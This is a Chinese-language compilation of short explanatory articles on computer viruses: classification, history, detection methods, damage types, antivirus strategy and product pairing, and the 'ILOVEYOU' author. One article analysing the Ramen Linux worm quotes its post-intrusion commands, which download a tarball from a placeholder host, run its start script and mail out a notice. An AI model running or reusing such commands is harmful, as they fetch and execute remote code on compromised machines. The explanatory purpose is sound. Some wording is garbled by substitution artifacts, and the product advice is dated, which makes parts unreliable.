爱华网计算机病毒分类
根据多年对计算机病毒的研究,按照科学的,系统的,严密的方法,计算机病毒可分类如下:
按照计算机病毒属性的分类
1、病毒存在的媒体
根据病毒存在的媒体,病毒可以划分为网络病毒,文件病毒,引导型病毒。
网络病毒通过计算机网络传播感染网络中的可执行文件,文件病毒感染计算机中的文件,引导型病毒感染启动扇区和硬盘的系统引导扇区,还有这三种情况的混合型,例如:多型病毒感染文件和引导扇区两种目标,这样的病毒通常都具有复杂的算法,它们使用非常规的办法侵入系统,同时使用了加密和变形算法。
2、病毒传染的方法
3、病毒破坏的能力
根据病毒破坏的能力可划分为以下几种:
无害型:除了传染时减少磁盘的可用空间外,对系统没有其它影响。
无危险型:这类病毒仅仅是减少内存、显示图像、发出声音及同类音响。
危险型:这类病毒在计算机系统操作中造成严重的错误。
非常危险型:这类病毒删除程序、破坏数据、清除系统内存区和操作系统中重要的信息。
这些病毒对系统造成的危害,并不是本身的算法中存在危险的调用,而是当它们传染时会引起无法预料的和灾难性的破坏。由病毒引起其它的程序产生的错误也会破坏文件和扇区,这些病毒也按照他们引起的破坏能力划分。一些现在的无害型病毒也可能会对新版的DOS、Windows和其它操作系统造成破坏。例如:在早期的病毒中,有一个Denzuk病毒在360K磁盘上很好的工作,不会造成任何破坏,但是在后来的高密度软盘上却能引起大量的数据丢失。
4、病毒特有的算法
根据病毒特有的算法,病毒可以划分为:
伴随型病毒:这一类病毒并不改变文件本身,它们根据算法产生EXE文件的伴随体,具有同样的名字和不同的扩展名,例如:XCOPY.EXE的伴随体是XCOPY.COM。病毒把自身写入COM文件并不改变EXE文件,当DOS加载文件时,伴随体优先被执行到,再由伴随体加载执行原来的EXE文件。
蠕虫型病毒:通过计算机网络传播,不改变文件和资料信息,利用网络从一台机器的内存传播到其它机器的内存,计算网络地址,将自身的病毒通过网络发送。有时它们在系统存在,一般除了内存不占用其它资源。
寄生型病毒:除了伴随和蠕虫型,其它病毒均可称为寄生型病毒,它们依附在系统的引导扇区或文件中,通过系统的功能进行传播,按算法分为:
练习型病毒:病毒自身包含错误,不能进行很好的传播,例如一些病毒在调试阶段。
诡秘型病毒:它们一般不直接修改DOS中断和扇区数据,而是通过设备技术和文件缓冲区等DOS内部修改,不易看到资源,使用比较高级的技术。利用DOS空闲的数据区进行工作。
变型病毒:这一类病毒使用一个复杂的算法,使自己每传播一份都具有不同的内容和长度。它们一般的作法是一段混有无关指令的解码算法和被变化过的病毒体组成。
计算机病毒小知识速查系列三
计算机病毒的发展
在病毒的发展史上,病毒的出现是有规律的,一般情况下一种新的病毒技术出现后,病毒迅速发展,接着反病毒技术的发展会抑制其流传。操作系统进行升级时,病毒也会调整为新的方式,产生新的病毒技术。它可划分为:
1、DOS引导阶段
1987年,计算机病毒主要是引导型病毒,具有代表性的是小球和石头病毒。
当时得计算机硬件较少,功能简单,一般需要通过软盘启动后使用。引导型病毒利用软盘得启动原理工作,它们修改系统启动扇区,在计算机启动时首先取得控制权,减少系统内存,修改磁盘读写中断,影响系统工作效率,在系统存取磁盘时进行传播。1989年,引导型病毒发展为可以感染硬盘,典型的代表有石头2。
2、DOS可执行阶段
1989年,可执行文件型病毒出现,它们利用DOS系统加载执行文件的机制工作,代表为耶路撒冷,星期天病毒,病毒代码在系统执行文件时取得控制权,修改DOS中断,在系统调用时进行传染,并将自己附加在可执行文件中,使文件长度增加。1990年,发展为复合型病毒,可感染COM和EXE文件。
3、伴随、批次型阶段
1992年,伴随型病毒出现,它们利用DOS加载文件的优先顺序进行工作。具有代表性的是金蝉病毒,它感染EXE文件时生成一个和EXE同名的扩展名为COM伴随体;它感染COM文件时,改为原来的COM文件为同名的EXE文件,在产生一个原名的伴随体,文件扩展名为COM。这样,在DOS加载文件时,病毒就取得控制权。这类病毒的特点是不改变原来的文件内容,日期及属性,解除病毒时只要将其伴随体删除即可。在非DOS操作系统中,一些伴随型病毒利用操作系统的描述语言进行工作,具有典型代表的是海盗旗病毒,它在得到执行时,询问用户名称和口令,然后返回一个出错信息,将自身删除。批次型病毒是工作在DOS下的和海盗旗病毒类似的一类病毒。
4、幽灵、多形阶段
1994年,随着汇编语言的发展,实现同一功能可以用不同的方式进行完成,这些方式的组合使一段看似随机的代码产生相同的运算结果。幽灵病毒就是利用这个特点,每感染一次就产生不同的代码。例如一半病毒就是产生一段有上亿种可能的解码运算程序,病毒体被隐藏在解码前的数据中,查解这类病毒就必须能对这段数据进行解码,加大了查毒的难度。多形型病毒是一种综合性病毒,它既能感染引导区又能感染程序区,多数具有解码算法,一种病毒往往要两段以上的子程序方能解除。
5、生成器、变体机阶段
1995年,在汇编语言中,一些数据的运算放在不同的通用寄存器中,可运算出同样的结果,随机的插入一些空操作和无关指令,也不影响运算的结果,这样,一段解码算法就可以由生成器生成。当生成的是病毒时,这种复杂的称之为病毒生成器和变体机就产生了。具有典型代表的是病毒制造机VCL,它可以在瞬间制造出成千上万种不同的病毒,查解时就不能使用传统的特征识别法,需要在宏观上分析指令,解码后查解病毒。变体机就是增加解码复杂程度的指令生成机制。
6、网络、蠕虫阶段
1995年,随着网络的普及,病毒开始利用网络进行传播,它们只是以上几代病毒的改进。在非DOS操作系统中,蠕虫是典型的代表,它不占用除内存以外的任何资源,不修改磁盘文件,利用网络功能搜索网络地址,将自身向下一地址进行传播,有时也在网络服务器和启动文件中存在。
7、视窗阶段
1996年,随着Windows和Windows95的日益普及,利用Windows进行工作的病毒开始发展,它们修改文件,典型的代表是DS.3873,这类病毒的急智更为复杂,它们利用保护模式和API调用接口工作,解除方法也比较复杂。
8、宏病毒阶段
1996年,随着WindowsWord功能的增强,使用Word宏语言也可以编制病毒,这种病毒使用类Basic语言,编写轻易,感染Word文档文件。在Excel和AmiPro出现的相同工作机制的病毒也归为此类。由于Word文档格式没有公开,这类病毒查解比较困难。
9、互连网阶段
1997年,随着因特网的发展,各种病毒也开始利用因特网进行传播,一些携带病毒的数据包和邮件越来越多,假如不小心打开了这些邮件,机器就有可能中毒。
10Java、邮件炸弹阶段
1997年,随着万维网上Java的普及,利用Java语言进行传播和资料获取的病毒开始出现,典型的代表是JavaSnake病毒。还有一些利用邮件服务器进行传播和破坏的病毒,例如Mail-Bomb病毒,它就严重影响因特网的效率。
计算机病毒小知识速查系列四
计算机病毒的危害性
1988年11月2日下午5时1分59秒,美国康奈尔大学的计算机科学系研究生,23岁的莫里斯将其编写的蠕虫程序输入计算机网络。在几小时内导致因特网堵塞。这个网络连接着大学、研究机关的155000台计算机,使网络堵塞,运行迟缓。这件事就像是计算机界的一次大地震,引起了巨大反响,震动全世界,引起了人们对计算机病毒的恐慌,也使更多的计算机专家重视和致力于计算机病毒研究。1988年下半年,我国在统计局系统首次发现了小球病毒,它对统计系统影响极大。最近的CIH病毒,漂亮杀病毒等等都在全世界范围内造成了很大的经济和社会损失。
可以看到,随着计算机和因特网的日益普及,计算机病毒和崩溃,重要数据遭到破坏和丢失,会造成社会财富的巨大浪费,甚至会造成全人类的灾难。
国内外防毒行业发展
随着计算机技术发展得越来越快,使得计算机病毒技术与计算机反病毒技术的对抗也越来越尖锐。据统计,现在基本上天天都要出现几十种新病毒,其中很多病毒的破坏性都非常大,稍有不慎,就会给计算机用户造成严重后果。下面我们以介绍国内防毒行业的发展为主。
我国计算机反病毒技术的研究和发展,是从研制防病毒卡开始的。防病毒卡的核心实际上是一个软件,只不过将其固化在ROM中。它的出发点是想以不变应万变,通过动态驻留内存来监视计算机的运行情况,根据总结出来的病毒行为规则和经验来判定是否有病毒活动,通过截获中断控制权规则和经验来判定是否有病毒活动,并可以截获中断控制权来使内存中的病毒瘫痪,使其失去传染别的文件和破坏信息资料的能力,这就是防病毒卡带毒运行功能的基本原理。防病毒卡主要的不足是与正常软件非凡是国产的软件有不兼容的现象,误报、漏报病毒现象时有发生,降低了计算机运行速度,升级困难等。从防病毒技术上说是不成熟的,病毒知变万化,技术手段越来越高,企图以一种不变的技术对付病毒是不可能的。防病毒卡的动态监测技术、病毒行为规则的研究,对于发现计算机病毒起了很大的作用,这些技术是防病毒卡换精华。但是作为一个产品,只有这部分技术是远远不够的,这部分技术也没有太大的实际意义,所以防病毒卡的使用者在减少。
随着防病毒卡的衰落,解病毒软件则日益风行。解病毒软件最重要的功能是将病毒彻底干净地予以清除,假如说防病毒卡是治标的话,那么解病毒软件则是治本。
第一代反病毒技术是采取单纯的病毒特征判定,将病毒从带毒文件中清除掉。这种方式可以准确地清除病毒,可靠性很高。后来病毒技术发展了,非凡是加密和变形技术的运用,使得这种简单的静态扫描方式失去了作用。随之而来的反病毒技术也发展了一步。
第二代反病毒技术是采用静态广谱特征扫描方法检测病毒,这种方式可以更多地检测出变形病毒,但另一方面误报率也提高,尤其是用这种不严格的特征判定方式去清除病毒带来的风险性很大,轻易造成文件和数据的破坏。所以说静态防病毒技术也有难以克服的缺陷。
第三代反病毒技术的主要特点是将静态扫描技术和动态仿真跟踪技术结合起来,将查找病毒和清除病毒合二为一,形成一个整体解决方案,能够全面实现防、查、消等反病毒所必备的各种手段,以驻留内存方式防止病毒的入侵,凡是检测到的病毒都能清除,不会破坏文件和数据。随着病毒数量的增加和新型病毒技术的发展,静态扫描技术将会使查毒软件速度降低,驻留内存防毒模块轻易产生误报。
第四代反病毒技术则是针对计算机病毒的发展而基于病毒家族体系的命名规则、基于多位CRC校验和扫描机理,启发式智能代码分析模块、动态数据还原模块、内存解毒模块、自身免疫模块等先进的解毒技术,较好的解决了以前防毒技术顾此失彼、此消彼长的状态。
计算机病毒小知识速查系列五
病毒检测的方法
在与病毒的对抗中,及早发现病毒很重要。早发现,早处置,可以减少损失。检测病毒方法有:特征代码法、校验和法、行为监测法、软件模拟法,这些方法依据的原理不同,实现时所需开销不同,检测范围不同,各有所长。
特征代码法
特征代码法被早期应用于SCAN、CPAV等闻名病毒检测工具中。国外专家认为特征代码法是检测已知病毒的最简单、开销最小的方法。
特征代码法的实现步骤如下:
采集已知病毒样本,病毒假如既感染COM文件,又感染EXE文件,对这种病毒要同时采集COM型病毒样本和EXE型病毒样本。
在病毒样本中,抽取特征代码。依据如下原则:
抽取的代码比较非凡,不大可能与普通正常程序代码吻合。抽取的代码要有适当长度,一方面维持特征代码的唯一性,另一方面又不要有太大的空间与时间的开销。假如一种病毒的特征代码增长一字节,要检测3000种病毒,增加的空间就是3000字节。在保持唯一性的前提下,尽量使特征代码长度短些,以减少空间与时间开销。
在既感染COM文件又感染EXE文件的病毒样本中,要抽取两种样本共有的代码。将特征代码纳入病毒数据库。
打开被检测文件,在文件中搜索,检查文件中是否含有病毒数据库中的病毒特征代码。假如发现病毒特征代码,由于特征代码与病毒一一对应,便可以断定,被查文件中患有何种病毒。
采用病毒特征代码法的检测工具,面对不断出现的新病毒,必须不断更新版本,否则检测工具便会老化,逐渐失去实用价值。病毒特征代码法对从未见过的新病毒,自然无法知道其特征代码,因而无法去检测这些新病毒。
特征代码法的优点是:检测准确快速、可识别病毒的名称、误报警率低、依据检测结果,可做解毒处理。其缺点是:不能检测未知病毒、搜集已知病毒的特征代码,费用开销大、在网络上效率低。
其特点:
A.速度慢。随着病毒种类的增多,检索时间变长。假如检索5000种病毒,必须对5000个病毒特征代码逐一检查。假如病毒种数再增加,检病毒的时间开销就变得十分可观。此类工具检测的高速性,将变得日益困难。
B.误报警率低。
非C.不能检查多形性病毒。特征代码法是不可能检测多态性病毒的。国外专家认为多态性病毒是病毒特征代码法的索命者。
D.不能对付隐蔽性病毒。隐蔽性病毒假如先进驻内存,后运行病毒检测工具,隐蔽性病毒能先于检测工具,将被查文件中的病毒代码剥去,检测工具的确是在检查一个虚假的好文件,而不能报警,被隐蔽性病毒所蒙骗。
校验和法
将正常文件的内容,计算其校验和,将该校验和写入文件中或写入别的文件中保存。在文件使用过程中,定期地或每次使用文件前,检查文件现在内容算出的校验和与原来保存的校验和是否一致,因而可以发现文件是否感染,这种方法叫校验和法,它既可发现已知病毒又可发现未知病毒。在SCAN和CPAV工具的后期版本中除了病毒特征代码法之外,还纳入校验和法,以提高其检测能力。
这种方法既能发现已知病毒,也能发现未知病毒,但是,它不能识别病毒类,不能报出病毒名称。由于病毒感染并非文件内容改变的唯一的非他性原因,文件内容的改变有可能是正常程序引起的,所以校验和法经常误报警。而且此种方法也会影响文件的运行速度。
病毒感染的确会引起文件内容变化,但是校验和法对文件内容的变化太敏感,又不能区分正常程序引起的变动,而频繁报警。用监视文件的校验和来检测病毒,不是最好的方法。
这种方法碰到下述情况:已有软件版更新、变更口令、修改运行参数、校验和法都会误报警。
校验和法对隐蔽性病毒无效。隐蔽性病毒进驻内存后,会自动剥去染毒程序中的病毒代码,使校验和法受骗,对一个有毒文件算出正常校验和。
运用校验和法查病毒采用三种方式:
①在检测病毒工具中纳入校验和法,对被查的对象文件计算其正常状态的校验和,将校验和值写入被查文件中或检测工具中,而后进行比较。
②在应用程序中,放入校验和法自我检查功能,将文件正常状态的校验和写入文件本身中,每当应用程序启动时,比较现行校验和与原校验和值。实现应用程序的自检测。
③将校验和检查程序常驻内存,每当应用程序开始运行时,自动比较检查应用程序内部或别的文件中预先保存的校验和。
校验和法的优点是:方法简单能发现未知病毒、被查文件的细微变化也能发现。其缺点是:发布通行记录正常态的校验和、会误报警、不能识别病毒名称、不能对付隐蔽型病毒。
行为监测法
利用病毒的特有行为特征性来监测病毒的方法,称为行为监测法。通过对病毒多年的观察、研究,有一些行为是病毒的共同行为,而且比较非凡。在正常程序中,这些行为比较罕见。当程序运行时,监视其行为,假如发现了病毒行为,立即报警。
这些做为监测病毒的行为特征如下:
A.占有INT13H
所有的引导型病毒,都攻击Boot扇区或主引导扇区。系统启动时,当Boot扇区或主引导扇区获得执行权时,系统刚刚开工。一般引导型病毒都会占用INT13H功能,因为其他系统功能未设置好,无法利用。引导型病毒占据INT13H功能,在其中放置病毒所需的代码。
B.改DOS系统为数据区的内存总量
病毒常驻内存后,为了防止DOS系统将其覆盖,必须修改系统内存总量。
C.对COM、EXE文件做写入动作
病毒要感染,必须写COM、EXE文件。
D.病毒程序与宿主程序的切换
染毒程序运行中,先运行病毒,而后执行宿主程序。在两者切换时,有许多特征行为。
行为监测法的优点:可发现未知病毒、可相当准确地预告未知的多数病毒。行为监测法的短处:可能误报警、不能识别病毒名称、实现时有一定难度。
软件模拟法
多态性病毒每次感染都变化其病毒密码,对付这种病毒,特征代码法失效。因为多态性病毒代码实施密码化,而且每次所用密钥不同,把染毒的病毒代码相互比较,也无法找出相同的可能做为特征的稳定代码。虽然行为检测法可以检测多态性病毒,但是在检测出病毒后,因为不知病毒的种类,难于做消毒处理。
计算机病毒小知识速查系列六
计算机病毒的破坏行为
计算机病毒的破坏行为体现了病毒的杀伤能力。病毒破坏行为的激烈程度取决于病毒作者的主观愿望和他所具有的技术能量。数以万计、不断发展扩张的病毒,其破坏行为千奇百怪,不可能穷举其破坏行为,难以做全面的描述。根据有的病毒资料可以把病毒的破坏目标和攻击部位归纳如下:
1.攻击系统数据区,攻击部位包括:
硬盘主引寻扇区、Boot扇区、FAT表、文件目录。一般来说,攻击系统数据区的病毒是恶性病毒,受损的数据不易恢复。
2.攻击文件
病毒对文件的攻击方式很多,可列举如下:删除、改名、替换内容、丢失部分程序代码、内容颠倒、写入时间空白、变碎片、假冒文件、丢失文件簇、丢失数据文件。
3.攻击内存
内存是计算机的重要资源,也是病毒的攻击目标。病毒额外地占用和消耗系统的内存资源,可以导致一些大程序受阻。病毒攻击内存的方式如下:占用大量内存、改变内存总量、禁止分配内存、蚕食内存。
4.干扰系统运行
病毒会干扰系统的正常运行,以此做为自己的破坏行为。此类行为也是花样繁多,可以列举下述诸方式:不执行命令、干扰内部命令的执行、虚假报警、打不开文件、内部栈溢出、占用非凡数据区、换现行盘、时钟倒转、重启动、死机、强制游戏、扰乱串并行口。
5.速度下降
病毒激活时,其内部的时间延迟程序启动。在时钟中纳入了时间的循环计数,迫使计算机空转,计算机速度明显下降。
6.攻击磁盘
攻击磁盘数据、不写盘、写操作变读操作、写盘时丢字节。
7.扰乱屏幕显示
病毒扰乱屏幕显示的方式很多,可列举如下:字符跌落、环绕、倒置、显示前一屏、光标下跌、滚屏、抖动、乱写、吃字符。
8.键盘
病毒干扰键盘操作,已发现有下述方式:响铃、封锁键盘、换字、抹掉缓存区字符、重复、输入紊乱。
9.喇叭
许多病毒运行时,会使计算机的喇叭发出响声。有的病毒作者让病毒演奏旋律美丽的世界名曲,在高雅的曲调中去杀戮人们的信息财富。有的病毒作者通过喇叭发出种种声音。已发现的有以下方式:演奏曲子、警笛声、炸弹噪声、鸣叫、咔咔声、嘀嗒声
10.攻击CMOS
在机器的CMOS区中,保存着系统的重要数据。例如系统时钟、磁盘类型、内存容量等,并具有校验和。有的病毒激活时,能够对CMOS区进行写入动作,破坏系统CMOS中的数据。
11.干扰打印机
假报警、间断性打印、更换字符。
计算机病毒小知识速查系列七
计算机病毒的防治策略
计算机病毒的防治要从防毒、查毒、解毒三方面来进行;系统对于计算机病毒的实际防治能力和效果也要从防毒能力、查毒能力和解毒能力三方面来评判。
防毒是指根据系统特性,采取相应的系统安全措施预防病毒侵入计算机。查毒是指对于确定的环境,能够准确地报出病毒名称,该环境包括,内存、文件、引导区、网络等。解毒是指根据不同类型病毒对感染对象的修改,并按照病毒的感染特性所进行的恢复。该恢复过程不能破坏未被病毒修改的内容。感染对象包括:内存、引导区、可执行文件、文档文件、网络等。
防毒能力是指预防病毒侵入计算机系统的能力。通过采取防毒措施,应可以准确地、实时地监测预警经由光盘、软盘、硬盘不同目录之间、局域网、因特网或其它形式的文件下载等多种方式进行的传输;能够在病毒侵入系统是发出警报,记录携带病毒的文件,即时清除其中的病毒;对网络而言,能够向网络治理员发送关于病毒入侵的信息,记录病毒入侵的工作站,必要时还要能够注销工作站,隔离病毒源。
查毒能力是指发现和追踪病毒来源的能力。通过查毒应该能准确地发现计算机系统是否感染有病毒,并准确查找出病毒的来源,并能给出统计报告;查解病毒的能力应由查毒率和误报率来评判。
解毒能力是指从感染对象中清除病毒,恢复被病毒感染前的原始信息的能力;解毒能力应用解毒率来评判。
计算机病毒小知识速查系列八
Ramen是Linux的“病”而非“毒”
前一段时间,一些媒体报告:“世界上第一个Linux病毒Reman已经出现”。这引起我极大的爱好,并想一睹Reman的庐山真面目。但是,当我得到该病毒的有关资料和样本之后发现:Reman并不能严格地称为病毒,它实际上只是一个古老的、在Unix/Linux世界早已存在的“缓冲区溢出”攻击程序。几乎所有Unix/Linux版本中都或多或少地存在这样的问题。第一次此种类型的攻击是在十多年前,Reman这种“缓冲区溢出”攻击程序并不是在今天的世界第一次出现。事实上,针对Windows98/NT的缓冲区溢出攻击也是很常见的,且并不被称为病毒。
缓冲区溢出的原理是:向一个有限空间的缓冲区拷贝了过长的字符串,覆盖相邻的存储单元,从而引起程序运行失败。因为自动变量保存在堆栈当中,当发生缓冲区溢出的时候,存储在堆栈中的函数返回地址也会被覆盖,从而无法从发生溢出的函数正常返回。在这样的情况下,系统一般报告:“coredump”或“segmentfault”。严重的情况是:假如覆盖缓冲区的是一段精心设计的机器指令序列,它可能通过溢出,改变返回地址,将其指向自己的指令序列,从而改变该程序的正常流程。这段精心设计的指令一般的目的是:“/bin/sh”,所以这段代码被称为“shellcode”。通过这样的溢出可以得到一个shell,仅此而已。但是,假如被溢出是一个suidroot程序,得到的将是一个rootshell。这样,机器的控制权已经易手,此后发生的任何事情都是合理的。
下面我们回到Reman。它首先对网络上的主机进行扫描,通过两个普通的漏洞进入系统,获取root权限,然后从源主机复制自身,以继续扫描网上其他服务器。对于RedHat6.2来讲,假如攻击成功,它会做以下工作:
mkdir/usr/src/.poop;cd/usr/src/.poop
exportTERM=vt100
lynx-sourcehttp://FROMADDR:27374/usr/src/.poop/ramen.tgz
cpramen。tgz/tmp
gzip-dramen.tgz;tar-xvframen。tar;./start.sh
echoEatYourRamen!
mail-sTOADDR-cgb31337@hotmail.comgb31337@yahoo.com
很明显,Reman只是一个自动化了的缓冲区溢出程序,而且是很普通的一种。目前缓冲区溢出攻击是非常普遍的一种攻击。黑客网站对各类系统的漏洞的发布几乎每日更新。这种攻击方式并不是不可避免,目前已有很多对付该类攻击的方案。需要指出的是:Reman这样的攻击程序对红旗Linux的攻击是不可能成功的,因为红旗Linux全线产品都考虑了“缓冲区溢出”这样的安全问题。
计算机病毒小知识速查系列九
专家谈计算机病毒高发季节的防护
4月是计算机病毒的高发季节。通过网络新途径,病毒早已突破了地域界限,飞速传播,预计本月有至少20余种电脑病毒将向我们的电脑发起猛攻,其中尤以4月26日的CIH病毒最为险恶。
八大“前兆”
“计算机‘发病’也有预兆,及早注重完全可以避免。”上海市信息办信息安全专家石坚提醒市民注重以下八大“前兆”:计算机经常性出现无缘无故的死机;计算机系统无法正常启动或启动变慢;键盘、显示有异常现象;运行速度明显变慢;以前能正常运行的软件经常发生内存不足的错误;文件的长度、内容、属性和日期等无故改变;经常丢失文件、丢失数据;自动链接到一些生疏网站。“当出现上述情况时,说明您的计算机很可能已经感染了病毒。”“临床”病征石坚还列出了病毒发作时的病症:如“胡言乱语”——提示一些不相干的话,发出一段音乐,产生特定的图像,硬盘灯不断闪烁;“胡搅蛮缠”——忽然进行游戏算法,鼠标自己在动,Windows桌面图标乱动,系统自动发送电子邮件。“病情”严重时计算机还会忽然死机或重新启动。
预防“接种”
市计算机病毒防范服务中心82000热线的专家专为电脑用户开出了春季预防“药方”,共计8味“良药”:个人计算机乃至整个网络都应安装实时防病毒软件,以建立完整的网络防毒架构;及时更新杀毒软件;不要打开任何附件后缀为VBS、CHM、PIF、SCR、SHS的文件,对附件后缀为EXE与COM的文件应先确认再打开;来历不明的邮件最好删除或先用防病毒软件检查;不要隐藏系统中已知文件类型的扩展名;所有主题有“FW:”的信件都要提高警惕;重要资料应作好备份;用户应使用最新版的OutlookExpress安全修补程序或将浏览器设成最高安全性。专家还欢迎市民带着问题参加本周六在上海图书馆知识广场举行的大型咨询活动。
计算机病毒小知识速查系列十
及时升级反病毒软件的利器
目前有许多电脑病毒发作特点不是快速而猛烈的,而是缓慢而狡猾的,有时还具有使用加密插件自动升级的能力,反病毒专家认为这些发作缓慢的病毒有非同平常的驻留本领,一旦发作将对计算机更加危险。正是由于病毒的日益增多,因此反病毒软件也得到了大家的欢迎。但现在的病毒能够自动地不断升级,这就要求我们必须及时地对反病毒软件进行升级发展,只有这样才能使计算机更加安全地使用。但对反病毒软件进行升级也不是一件很轻易的事情,除了要确保它的时效性外,我们还必须考虑到完成该工作所要的时间,以及由此带来的潜在的危险等因素,因为一点点的时间误差就可能给自己的计算机造成难以弥补的损失。那么我们该如何才能及时准确地升级反病毒软件呢?下面笔者就以McAfee系列的反病毒软件为例,和大家谈谈使用McAfee的ePo策略来在工作中及时完成对反病毒软件的升级工作。
McAfeeePo是英文McAfeeePolicyOrchestrator的缩写,它是一个与McAfee反病毒软件结合比较紧密的综合型治理工具,该工具一般具有智能组织用户、策略的实时变化、增强的报告、安全的策略治理以及无缝升级反病毒软件等特征,它可以帮助我们及时完成反病毒软件的分配工作,该项功能可以使我们这些普通的网民省却了购买或寻找第三方软件的麻烦,同样也会降低工作中可能存在的安装和升级的复杂性,更重要的一点就是ePo还可以与市面上流行的第三方软件分配工具进行高效协调地工作,另外ePo还能够监控并且改变用户机器的配置,获得状态和事件的增强报告,追踪病毒感染率和纠正行动。
对于我们远程用户来说,由于ePo是通过安全的http协议进行通信的,这样我们就可以通过因特网或者本地的局域网来远程治理自己的计算机系统,治理时,我们首先与ePo服务器建立连接,一旦与服务器连接成功后,ePo代理会自动连接到服务器并把自上一次通信以来所收集到的所有存储在本地的信息传送到服务器上。另外ePo设计合理的体系结构使得一台ePo服务器能够治理另外的一台和多台ePo服务器,这为ePo生成分组分级的报告打下了良好的基础,同时ePo还具备26个预设报告和无限的定置报告能力,这使得生成的数据报告具有很强的数据加工能力,比起其他软件的记流水帐的做法要强多了。假如病毒发作,ePo能将所有的McAfee反病毒软件设定为全企业的自动更新,启动一个手动扫描,并生成具体报告来查明侵入地点以及确认传播的方式和速度;当然ePo最受用户欢迎的是它支持自动更新,利用该功能我们可以花最少的钱和时间来获取及时地升级反病毒软件。
计算机病毒小知识速查系列十一
合理搭配使用杀病毒软件
面对如今层出不穷的各类杀毒软件,恐怕不单是“菜鸟”们找不着北,连一些“老鸟”也颇感头痛。由于个人机器的性能、用途、习惯、爱好甚至心态的不同,形成了自己的应用软件搭配风格,但几乎很少有朋友注重到这其中的技巧。
一、使用杀毒软件的几个误区
很多朋友认为自己的机器里头装了杀毒软件就万事大吉。其实到目前为止,世界上没有一家杀毒软件生产商敢承诺可以查杀所有已知病毒,这就意味着即便你装了杀毒软件,绝非从此就高枕无忧。我所见到的装备了杀毒软件的机器仍然被病毒侵蚀的案例不下10起。所以,在大家防范于未然的同时,合理搭配使用杀毒软件也是必不可少的。为数不少的朋友总是喜欢下载一大堆最新的却是连自己也不知道如何用的共享杀毒软件,甚至装了又删--直接后果是造成系统和其中某些程序产生冲突,有使系统崩溃的危险;注册表也因此会凌乱、臃肿;系统文件有可能被误删等,威胁着整个系统的安全。
许多人只注重在Windows系统下按要求安装杀毒软件,却忽略了DOS杀毒盘的重要性。病毒一旦感染了Windows系统应用程序,必须要在DOS下才能杀除。所以,朋友们一定要注重DOS应急盘的保护和更新。
二、如何合理搭配使用杀毒软件
大家都知道同时开启两套杀毒软件的实时监控有可能会引起冲突,但是在机器上安装多套杀毒软件的同时只开启一套杀毒软件的实时监控程序却是行得通的。这样一来,不但可以扬长避短发挥各自软件的优势,而且还可以交叉查杀病毒,极大的增强了机器的安全系数。假如您有条件,极力推荐!
合理搭配前对各种杀毒软件的特性要有必要的了解。目前的商业杀毒软件分为国产和欧美两大阵营。客观的讲,目前国产杀毒软件的无论是整体功能设计、查杀毒数量等等还是与国际先进水平有一定差距,但国产品牌在价格、服务等方面还是有优势的。这也是国产杀毒软件能占据80%国内市场份额的重要原因。
在国产品牌中,瑞星对新近出现的流行病毒的查杀效果很明显,但由于其是基于235K的病毒库,所以查杀毒数量始终是瑞星的瓶颈;KV3000对比起KV300有了质的飞跃,对各种病毒具有广泛查杀性,但是其更新速度稍慢,对新病毒的反应也不够快。这正好和瑞星有了互补的可能;金山毒霸和KILL也是各有优势。
国际品牌里首推McAfee。作为全球拥有7000万用户、号称世界第一品牌的杀毒软件,McAfee的确是做得不错:界面设计精致、合理,程序运行稳定,查杀毒数量在57000种以上。还有一点很重要:McAfee算是国际品牌里头最体贴中国用户的杀毒软件----尽管性能十分出色,但是其对资源的占用率还是在大多数中国用户的承受范围以内。PC-cillin也是一款很大气的杀毒软件,基本性能与McAfee比较类似,但在查杀毒的数量上较为落后。熊猫卫士和诺顿最大的相似之处是它们的实时监控程序占用了巨大的资源,假如您的机器是99年以前配置的话,基本上可以打消去试试这两款软件的念头了。当然,作为享有良好声誉的世界品牌,诺顿的综合实力也是出类拔萃的。熊猫卫士是一款非常好用的软件,哪怕您是头一次坐在电脑面前,您也不会对它有手足无措的感觉。
三、杀毒软件实用搭配方案
1.McAfee5.13+瑞星。利用McAfee极强的综合实力,发挥其在系统检测、对宏病毒的侦测、E-mail监控、实时监控恶意JAVA和ActiveX控件等方面的优势,加上McAfee本身具有的强大的查杀毒能力,辅之以对国内新流行病毒较为敏感、在DOS下非常易用且查杀毒性能很好的瑞星,这样一对组合应该说是非常理想的。经测试,在随系统只启动McAfee实时监控的前提下,建立在Windows98上的这一对组合没有任何冲突。
2.McAfee5.13+KILL。作为曾是国内杀毒权威认证形象的KILL,其在技术层面上不输于国内任何一家对手,况且CA的技术实力我们应当可以充分信赖。KILL在国内建立的病毒监视小组和CA遍布全球的40多家类似机构应该可以给您充足的安全感。事实上,在随系统开启McAfee实时监控的情况下,病毒入侵这一组合的可能性已经非常小了。经测试,无论是开启KILL还是McAfee的实时监控,都不会与系统发生冲突。
3.PC-cillin2001+KV3000。这又是一对黄金组合。PC-cillin2001公认的最大优势是其对以网络为载体的病毒和恶意JAVA和ActiveX程序的查杀;而KV3000拥有很好的DOS性能,一旦中招,还可利用KV3000转移阵线,在DOS下再与病毒决一雌雄;还有KVW3000庞大的病毒样板库、优越的实时监控性能也会让您安全感倍增。建议使用KVW3000的实时监控程序。这对组合经过长达4个月的测试,未发现与系统或其他软件冲突。
计算机病毒小知识速查系列十二
“我爱你”病毒创造者自白
菲律宾辍学生古兹曼因创造了历史上破坏力最强的计算机病毒“我爱你”而名扬世界。
他说,“我承认我创造病毒,但我不知道‘我爱你’病毒是不是我创造的病毒之一。”“假如能知道源代码,我可以查查看,也许是别人栽赃陷害,或是从我这里偷走的。”
24岁的古兹曼明白,在信息时代,名气转瞬即逝。菲律宾一所计算机学校的这名辍学生,想在“我爱你”病毒的恶名还没有被世人遗忘前,让全世界都知道他是一名技术高超的黑客,一名能瘫痪个人计算机的“指挥官”。不过,古兹曼要小心法律制裁。虽然到目前为止“我爱你”是不是他所创造的仍难以下结论,但事实上,从美国国防部到英国国会,几乎所有机构都没有逃脱“我爱你”的毒手,这个病毒瘫痪全球计算机所造成的损失约达100亿美元。在许多国家,古兹曼即使坐一辈子牢也难以洗清其罪名。
菲律宾当局以盗窃及其它罪名起诉古兹曼,但在去年8月份因证据不足而撤销。古兹曼没有受到法律制裁的另一个原因是“我爱你”病毒在去年5月爆发时,菲律宾还没有制裁计算机黑客行为的相关法规。
不过,菲律宾总统艾斯特拉达已在去年8月14日签署了电子商务法,古兹曼也陷入了两难境地:一方面他想承认是自己创造了“我爱你”病毒,这样他可以利用这项“荣耀”赚钱,另一方面在接受记者采访时,紧守不承认创造“我爱你”病毒的原则,因为他担心会再次吃上官司。
